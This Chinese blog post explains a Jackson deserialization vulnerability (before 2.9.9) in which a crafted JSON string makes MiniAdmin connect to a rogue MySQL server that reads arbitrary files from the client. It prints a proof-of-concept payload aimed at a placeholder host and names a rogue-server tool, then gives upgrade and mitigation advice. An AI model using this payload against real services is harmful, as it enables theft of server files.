Jackson安全漏洞,可导致服务器文件被恶意窃取

上周升级完Fastjson之后,去了解了下Jackson是否也有相关的漏洞。

果不其然,看到了一个issue

虽然这个issue是好几个月前的了,但是可能大家对Jackson比较不在意,以为国外的开源要牛逼一点,不会像Fastjson那么多问题,这里要纠正一点,fastjson之所以问题多,那是因为你接触的多,Jackson的问题其实也不少,只是你接触的少。

就拿这种issue的问题来说,这个漏洞也很严重,攻击者可以通过构造特殊的字符串,然后在特定条件下可以悄无声息的窃取你服务器上的文件数据。

可怕不?但是恐怕知道的人不多,很多服务还是依赖着低版本的Jackson,也没升级。

解释下到底是什么漏洞,这么危险!

使用了Jackson 2.9.9之前的Java应用,如果服务依赖了mysql-connector-java,那么这个服务所在机器上的文件,就可能被任意读取走。

下面是具体原理分析。

先看下Json序列化对多态性的处理方式

public static class Person {
    public String name;
    public int age;
    public Pet pet;
}
public static abstract class Pet {
    public String name;
}
public static class Dog extends Pet {
    public int age;
}
public static class Cat extends Pet {
}

ObjectMapper om = new ObjectMapper();
Person p = new Person();
p.name = "小黑";
p.age = 28;
Dog pet = new Dog();
pet.name = "小强";
pet.age = 2;
p.pet = pet;
System.out.println(om.writeValueAsString(p));

序列化之后

{"name":"小黑","age":28,"pet":{"name":"小强","age":2}}

序列化后类型消失,反序列化时因为Pet是抽象类,不知道该创建哪一个子类的对象。

但是Jackson提供了Default Typing,在开启的时候,可以序列化出更具体的类型。

ObjectMapper om = new ObjectMapper();
om.enableDefaultTyping(); 

得到的结果:

{"name":"小黑","age":28,"pet":["***.Dog",{"name":"小强","age":2}]}

所以,Jackson在开启Default Typing特性之后,就可以初始化一个具体的实例。

这个讲完之后,我们看下漏洞的最终元凶,MySQL的一个特殊用法:支持使用LOAD DATA LOCAL INFILE这样的语法,只要客户端连上某个MySQL服务,就可以把客户端本地文件的数据插入到这个MySQL的某个表中。

大概过程是这样的:

  • 用户在客户端输入:load data local infile "/data.csv" into table test;
  • 客户端=>服务端:我想把我本地的/data.csv文件插入到test表中;
  • 服务端=>客户端:把你本地的/data.csv发给我;
  • 客户端=>服务端:/data.csv文件的内容;

这里有一个问题,客户端发送哪个文件的内容,取决于第3步,如果服务端是个恶意的MySQL服务,那么他可以读取客户端的任意文件,比如读取/etc/passwd:

  • 用户在客户端输入:load data local infile "/data.csv" into table test;
  • 客户端=>服务端:我想把我本地的/data.csv文件插入到test表中;
  • 服务端=>客户端:把你本地的/etc/passwd发给我;
  • 客户端=>服务端:/etc/passwd文件的内容;

然后密码文件的内容就这样被嫖了。

引用MySQL官方文档如下:

In theory, a patched server could be built that would tell the client program to transfer a file of the server's choosing rather than the file named by the client in the LOAD DATA statement.

理论上,可以构建一个伪装服务器,它将告诉客户端传送一个服务指定的而不是通过客户端LOAD DATA语句指定的文件,意味着,我要什么,你就得给我什么,所以所有文件都可能泄露。

具体如何让服务中的MySQL客户端可以听我指挥,连到我预谋已久的MySQL服务呢?

首先,在MySQL的JDBC驱动中有一个创建连接的配置allowLoadLocalInfile,控制是否可以从本地读取文件,默认是可以的。

另外,不知道从哪个版本开始,MySQL的JDBC驱动多了一个类com.mysql.cj.jdbc.admin.MiniAdmin,可能没什么人用过,平时也用不到,但是它的牛逼之处在于可以创建一个到执行URL的JDBC连接。

public class MiniAdmin {
        private JdbcConnection conn;
    
        public MiniAdmin(String jdbcUrl) throws SQLException {
            this(jdbcUrl, new Properties());
        }
    
        public MiniAdmin(String jdbcUrl, Properties props) throws SQLException {
            this.conn = (JdbcConnection) (new Driver().connect(jdbcUrl, props));
        }
    
        ...
    }

想想,如果这个URL是我的那个伪装的MySQL服务,是不是就可以控制这个客户端轻松练上来,然后做一些不为人知的事情了。

事实上,确实可以。通过Jackson的反序列化特殊字符串,可以触发MiniAdmin的初始化,然后就在构造方法里创建一个到指定我MySQL服务的JDBC连接。

我们动手创建一个恶意的MySQL服务,可以使用https://github.com/Gifts/Rogue-MySql-Server,这个服务会读取客户端文件,并写入到mysql.log中。

启动服务,假设服务地址为:X.X.X.X.

    ObjectMapper om = new ObjectMapper();
    om.enableDefaultTyping();

    String poc = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://X.X.X.X:3306/db\"]";
    Object obj = om.readValue(poc, Object.class);

在客户端中执行如上代码,端口号和文件号在Rogue-MySql-Server中写死了,执行完之后,机器上的c:\windows\win.ini文件内容就会出现在mysql.log中。

在实际的生产环境中,可以通过往一些接受JSON参数的接口发送恶意的JSON数据来达成攻击的目的。

MySQL方面,从8.0.15开始将allowLoadLocalInfile默认值设置为false。

Jackson方面,从2.9.9版本开始,将com.mysql.cj.jdbc.admin.MiniAdmin加入反序列化黑名单:

怎么保护自己的系统

1、反序列化的坑,很大!需要尽量避免使用Object对象作为Jackson反序列化的目标。
2、序列化工具,该升级的要升级,不能拖!

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 206,602评论 6 481
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 88,442评论 2 382
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 152,878评论 0 344
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 55,306评论 1 279
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 64,330评论 5 373
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,071评论 1 285
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,382评论 3 400
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,006评论 0 259
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 43,512评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,965评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,094评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,732评论 4 323
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,283评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,286评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,512评论 1 262
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,536评论 2 354
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,828评论 2 345

推荐阅读更多精彩内容